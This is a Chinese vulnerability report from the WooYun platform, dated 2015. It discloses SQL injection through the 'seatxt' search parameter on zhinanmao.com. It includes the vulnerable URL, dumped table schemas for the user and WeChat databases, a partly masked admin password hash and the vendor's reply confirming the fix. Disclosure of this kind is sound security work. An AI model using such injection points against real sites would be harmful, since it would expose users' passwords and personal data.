漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136827
漏洞标题:指南猫某站SQL注入漏洞(整站数据全站用户信息告急)
相关厂商:zhinanmao.com
漏洞作者: M4sk
提交时间:2015-08-26 15:05
修复时间:2015-10-10 18:36
公开时间:2015-10-10 18:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开
简要描述:
RT
详细说明:
http://v1.zhinanmao.com/?r=search%2Fsearch&seatxt=11&search_class=1
seatxt=参数问题
Database: znm_db
Table: znm_user
[50 columns]
+-------------------------+----------------------+
| Column | Type |
+-------------------------+----------------------+
| create_time | int(10) unsigned |
| invite_uid | int(10) unsigned |
| update_time | int(10) unsigned |
| user_authy | char(10) |
| user_birth_day | int(10) unsigned |
| user_birth_month | int(10) unsigned |
| user_birth_type | int(10) unsigned |
| user_birth_year | int(10) unsigned |
| user_city | int(10) unsigned |
| user_country | int(10) unsigned |
| user_credits | int(10) unsigned |
| user_diary_total | int(10) unsigned |
| user_email | char(30) |
| user_email_auth | tinyint(3) unsigned |
| user_fans_total | int(10) unsigned |
| user_faver_total | int(10) unsigned |
| user_focus_total | int(10) unsigned |
| user_fund_total | int(10) unsigned |
| user_gone_city_total | int(10) unsigned |
| user_gone_country_total | int(10) unsigned |
| user_gone_total | int(10) unsigned |
| user_home_city | int(10) unsigned |
| user_home_country | int(10) unsigned |
| user_home_prov | int(10) unsigned |
| user_icon | char(20) |
| user_id | bigint(20) |
| user_level | int(2) |
| user_login_ip | char(16) |
| user_login_last | int(10) unsigned |
| user_login_status | smallint(3) unsigned |
| user_login_total | int(10) unsigned |
| user_mobile | char(15) |
| user_money | int(10) unsigned |
| user_name | varchar(32) |
| user_nickname | varchar(32) |
| user_password | varchar(32) |
| user_plan_total | int(10) unsigned |
| user_private | tinyint(3) unsigned |
| user_private_msg_total | int(10) unsigned |
| user_prov | int(10) unsigned |
| user_qq | char(12) |
| user_question_total | int(10) unsigned |
| user_realname | varchar(30) |
| user_reg_ip | char(16) |
| user_reply_msg_total | int(10) unsigned |
| user_sex | smallint(1) |
| user_sex_private | tinyint(3) unsigned |
| user_sys_msg_total | int(10) unsigned |
| user_travel_faver | tinyint(2) |
| user_wanna_total | int(10) unsigned |
+-------------------------+----------------------+
用户账号密码都在上面了~ 你懂得了~
还有微信的
Database: znm_weixin
[5 tables]
+-------------------+
| znm_weixin_admin |
| znm_weixin_group |
| znm_weixin_msg |
| znm_weixin_unread |
| znm_weixin_user |
+-------------------+
不小厂商吧~ 整站数据库都在这
admin / 9b6db97******2137c2143049 (******)
前台吧~
漏洞证明:
综上
修复方案:
过滤
版权声明:转载请注明来源 M4sk@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-08-26 18:35
厂商回复:
感谢白帽子 M4sk 给我们敲响安全警钟!指南猫已意识到安全的重要性,正在紧急修复。
最新状态:
2015-08-29:已在第一时间紧急修改,并加强了安全措施,感谢 @M4sk